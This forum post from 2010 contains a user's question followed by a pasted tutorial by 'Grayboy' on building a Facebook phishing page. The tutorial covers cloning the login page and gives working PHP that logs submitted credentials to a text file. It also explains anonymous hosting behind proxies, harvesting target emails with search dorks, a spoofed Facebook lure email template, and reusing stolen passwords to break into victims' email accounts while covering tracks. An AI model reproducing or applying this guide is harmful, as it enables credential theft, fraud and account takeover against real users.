Question in Grayboys Phishing Guide.

edited September 2010 in Tech & Games
So I've got my log in htm file, along with the php redirect. But I don't understand the step where hes says:
"Ok now open up one of your notepad documents. Copy it all in. Press “CTRL+F” and type action into the bar that comes up. Next to “action” is a website address in some parenthesis. Take out the address but not the parenthesis, and replace it with “post.php” . Now save this as “index.htm, thus making it into a webpage that bears a striking resemblance to facebook."


Exactly what bar is supposed to come up? There are also many addresses in the code and don't see what one it is. Is this out dated? I might as well just post his guide then be bothered gravedigging it.











How to-make a phishing page by Grayboy 

What is a phishing page?
A phishing page is a fake login page, for example a fake facebook login. Instead of logging you into facebook, it keeps the password!


Preparation work

A journey of a thousand miles starts with a first step, here is yours. This needs to be organised, so create a folder on your pc called “phishing”. Then right click inside it and go to new, then new notepad document. Make two of these. Then go onto tools>folder options>view. Scroll right down and make sure the box that says “hide extensions for known file types” is not ticked.
Now you are ready to begin.

Step one-choose your target.

To phish, you need a website to phish. The only rule is it has to have a login. Social networking sites are the most common, full to the brim with retarded teenagers as well so it is target rich, and half of them have the same password on there as there hotmail. Your choice however, for the sakes of this run through lets do facebook.

Step two-make the index page.

This is like the home page of the phishing site, which the target will see. We need to make it exactly like facebook, tricky right? Nope, just copy their code! To do this go onto www.facebook.com, right click in the white spaces and go to “view page source”. When it opens up press “CTRL+A”, then “CTRL+C” to copy the code to your ciipboard.

Ok now open up one of your notepad documents. Copy it all in. Press “CTRL+F” and type action into the bar that comes up. Next to “action” is a website address in some parenthesis. Take out the address but not the parenthesis, and replace it with “post.php” . Now save this as “index.htm, thus making it into a webpage that bears a striking resemblance to facebook.

Step three-make the php file.
This is the form that handles the fake login. It will send the reader to facebook after they have logged in like they have typed the wrong password. Plus it will create a text file with the password in it which will be called username.txt

Copy this code into the second notepad document;
CODE:
<?php
header ('Location: www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Remember, where it says facebook, it can be changed to any site.

Save this as “post.php”.

Step 4-hitting the World Wide Web!

Whilst this is all well and good, it won’t do anything sat on your computer! It need to be uploaded.
Remember phishing is illegal, and even though it is very laxly enforced, it still makes sense not to have your ip (internet protocol) address linked to it as it can be tracked back to you. So go on www.proxy.org and choose one of the many proxies linked.
Test it, see if it is fast. If it is use it go to http://www.ripway.com/.
Also open a temporary email account on www.10minutemail.com , use this to provide an email address.
Get your username as close to facebook as possible, and give a fake name and address.
Then go to filemanager, delete the index.htm that is already there. Now upload your own index.htm and post.php.
Ok now time to test it ,type in a random username and password, let the form go through. Then go back to your file manager and a new file called usernames.txt should be there. Click it and, as if by magic the username and password you provided will be there!

Step 5-Getting it out their!

Okay now for this you are going to need a fake email. Again use proxies and fake names to create it. The fake name should be “facebook” so that’s what the targets see when your email comes through. Something like [email protected] should be ok.

You need people to send it to. If you know any particular people you want to phish do them, but I am assuming you like everyone you know pretty much and need randomers. If that is the case google is our friend!

Go on google and type in site:[url]www.facebook.com:”@hotmail.com”[/url] . Or you can type in filetype:ctt "@msn&quot; on google. Both of these will give you lots of targets. Copy these using this -http://www.surf7.net/services/value-added-services/free-web-tools/email-extractor-lite/

Now you need to get the actual content sorted. I recommend using a real email from the site and personalising it. For example;

Rosanna (Any girls name will do xd) tagged 5 photos of you in the album "AWESOME tymes xx".

To see the photos, follow the link below:
Your link here with a load of random stuff afterwards to bulk it out. For example I would use http://randomusername123abcgh.110mb.com/ ,except yours will sound a lot more realistic xd
Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to:http://www.facebook.com/find-friends/?ref=email

Do you want to control which emails you receive from Facebook? Go to:
http://www.facebook.com/editaccount....Y1NzY0MDQzMg==
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.
So send all these emails out and hope for the best, remember it is a luck thing xd, a law of averages dictates you will get like 30% maybe, so send loads out 

Step 6-Using the passwords

Again use a proxy to access them. Now you might be bored and just want to deface some facebooks or whatever, and that’s fine. However I would trying the password with there hotmail/email address seriously recommend  .If you get into a hotmail use a proxy, do all the password reminders you can, and remember to double delete (delete from delete folder as well) any reminders or resets you use . Also any email you read you should mark as unread afterwards , just to be on the safe side 

Okay, thanks for reading, and remember this is all educational innit?
Sign In or Register to comment.